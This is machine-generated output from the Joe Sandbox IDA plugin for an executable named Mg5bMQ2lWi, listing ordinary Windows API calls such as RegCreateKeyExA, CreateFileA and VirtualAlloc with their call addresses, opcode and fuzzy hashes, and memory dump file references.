                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                            • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                                                            • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                            • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                                                            APIs
                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                                                            • Instruction ID: f0f4a7cc191af20e9b9700f54d410718858f5ac06abb37c2f1ccc41e28cff8f4
                                                                                                            • Opcode Fuzzy Hash: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                                                            • Instruction Fuzzy Hash: 05E07EB2610129AF9B40DE8CDC81EEB37ADEB1D350F408016FA08D7200C274EC519BB4
                                                                                                            APIs
                                                                                                            • FindClose.KERNEL32(00000000,000000FF,0046F950,00000000,0047073F,?,00000000,00470788,?,00000000,004708C1,?,00000000,0000003C,00000000), ref: 0045412A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseFind
                                                                                                            • String ID:
                                                                                                            • API String ID: 1863332320-0
                                                                                                            • Opcode ID: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
                                                                                                            • Instruction ID: 5eabd71f03f270c9e36328c123aabe4f760eecb17ac4c97f42f59bce307939db
                                                                                                            • Opcode Fuzzy Hash: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
                                                                                                            • Instruction Fuzzy Hash: CEE065B0A04A004BCB14DF3A898425676D25FD5324F04C56AAC58CF3D6E63C84859A26
                                                                                                            APIs
                                                                                                            • KiUserCallbackDispatcher.NTDLL(00493E46,?,00493E68,?,?,00000000,00493E46,?,?), ref: 004146AB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2492992576-0
                                                                                                            • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                            • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                                            • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                            • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                                            APIs
                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3934441357-0
                                                                                                            • Opcode ID: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
                                                                                                            • Instruction ID: 1f586823f232578dbf745533d190da316c23ef772c10fc749b20f2ce5ea51255
                                                                                                            • Opcode Fuzzy Hash: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
                                                                                                            • Instruction Fuzzy Hash: E0D05B723091117AD620955F6C44DA76BDCCBC5770F11063EB558D72C1D7309C01C675
                                                                                                            APIs
                                                                                                              • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
                                                                                                            • ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                                              • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoParametersSystem$ShowWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3202724764-0
                                                                                                            • Opcode ID: 1489a060ee1bcc8cc48c15b27d983b014cc6d9756e6ca662c79b076239964338
                                                                                                            • Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
                                                                                                            • Opcode Fuzzy Hash: 1489a060ee1bcc8cc48c15b27d983b014cc6d9756e6ca662c79b076239964338
                                                                                                            • Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC
                                                                                                            APIs
                                                                                                            • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: TextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 530164218-0
                                                                                                            • Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                                            • Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
                                                                                                            • Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                                            • Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8
                                                                                                            APIs
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2492992576-0
                                                                                                            • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                            • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                                            • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                            • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                                            APIs
                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00450C2B,00000000), ref: 0042CCFB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 01dbdc36424fec664e934353753d4045270514496262de1bfab72665a96f96e3
                                                                                                            • Instruction ID: cee2652a42bb6fa335edebfce0b7cce520d77b1cbd3538a4821e8cc024acaa82
                                                                                                            • Opcode Fuzzy Hash: 01dbdc36424fec664e934353753d4045270514496262de1bfab72665a96f96e3
                                                                                                            • Instruction Fuzzy Hash: 66C08CE03222001A9A1065BD3CC911F06C8892833A3A41F37B438E32D2E23E88266028
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 7f8aa10a2b0ebcd99225cbdae7d816ffd0c8159e943a954a1b877cbd8b688861
                                                                                                            • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                                            • Opcode Fuzzy Hash: 7f8aa10a2b0ebcd99225cbdae7d816ffd0c8159e943a954a1b877cbd8b688861
                                                                                                            • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                                            APIs
                                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentDirectory
                                                                                                            • String ID:
                                                                                                            • API String ID: 1611563598-0
                                                                                                            • Opcode ID: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                                            • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                                                            • Opcode Fuzzy Hash: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                                            • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                                                            APIs
                                                                                                            • SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                                                              • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 734332943-0
                                                                                                            • Opcode ID: 40f744221a1c0ad34bc3dfd7c8217ba7111344780b163017895d6acbe08c1ff7
                                                                                                            • Instruction ID: f3a0f6ff35c414572697f21b60dc386cc542920b113ac52c9a1142ed5c58418d
                                                                                                            • Opcode Fuzzy Hash: 40f744221a1c0ad34bc3dfd7c8217ba7111344780b163017895d6acbe08c1ff7
                                                                                                            • Instruction Fuzzy Hash: 54C04CA1B0010147DF00AAAED5C1A0763D85E4E2093144076B504CF206D6A9D8084A24
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(?,0042E335), ref: 0042E328
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2340568224-0
                                                                                                            • Opcode ID: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
                                                                                                            • Instruction ID: 885b9387dc4d85ef1a6bcc41b3ac28186c42b97ac018e1411ad6f8b1d6607996
                                                                                                            • Opcode Fuzzy Hash: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
                                                                                                            • Instruction Fuzzy Hash: CFB09B7770C6006DB705DA95B45192D63E4D7C47203E14577F400D3580D93C58014918
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                                            • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                                                            • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                                            • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
                                                                                                            • Instruction ID: 72cb28a769613da0e12d57a8c8ff31d21ec4f608c404a89b028e4eccd5103e64
                                                                                                            • Opcode Fuzzy Hash: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
                                                                                                            • Instruction Fuzzy Hash: 87518570E041459FEB01EFA9C482AAEBBF5EB49304F51817BE500E7351DB389D46CB98
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
                                                                                                            • Instruction ID: b55a7b9a32de56e4c0cdb05f5aaeda5055a0700d8eb896d56cc2d0e0b2117302
                                                                                                            • Opcode Fuzzy Hash: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
                                                                                                            • Instruction Fuzzy Hash: F01148742007069BC710DF19C880B86FBE4EB98390B14C53BE9988B385D374E8598BA9
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(00000000,0045268D), ref: 0045266F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1452528299-0
                                                                                                            • Opcode ID: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
                                                                                                            • Instruction ID: 0a85f8cb76b48f87276e85e1927624e59cb24adfaf40460ac6081df001af0a23
                                                                                                            • Opcode Fuzzy Hash: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
                                                                                                            • Instruction Fuzzy Hash: BD0170356046446F8B10DF699C404EEF7F8DB4A3207208277FC64D3352DB745D099664
                                                                                                            APIs
                                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,?,?,000023E4,000063E7,00401973), ref: 00401766
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1263568516-0
                                                                                                            • Opcode ID: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                                                            • Instruction ID: 2f1b12c935ae24389c3dd8db424781fbbcf1746defe36878ea7ad6421184be39
                                                                                                            • Opcode Fuzzy Hash: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                                                            • Instruction Fuzzy Hash: 0C0170766043108FC3109F29DCC4E2677E8D780378F05413EDA84673A0D37A6C0187D9
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
